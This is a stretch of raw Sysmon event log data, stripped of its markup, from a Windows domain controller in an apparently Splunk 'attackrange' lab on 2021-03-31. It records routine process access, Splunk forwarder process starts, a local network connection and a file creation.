12:03:05.449{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:05.449{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.449{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:05.449{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.434{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:05.434{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.434{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:05.434{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.434{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:05.434{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.060{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F8-6064-0A01-00000000AE01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:05.060{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.060{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:05.060{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.060{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.060{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F8-6064-0A01-00000000AE01}6068C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.060{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F8-6064-0A01-00000000AE01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.920{266CAFBE-64F8-6064-0A01-00000000AE01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.852{266CAFBE-64FA-6064-0D01-00000000AE01}63246316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000008667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.993{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53603-false10.0.1.12-8000- 11241100x80000000000000008666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.681{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeC:\Users\Administrator\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat2021-03-31 12:03:06.681 10341000x80000000000000008665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:06.681{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64FA-6064-0D01-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.681{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:06.681{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.681{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:06.681{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.681{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64FA-6064-0D01-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.681{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64FA-6064-0D01-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.541{266CAFBE-64FA-6064-0D01-00000000AE01}6324C:\Program 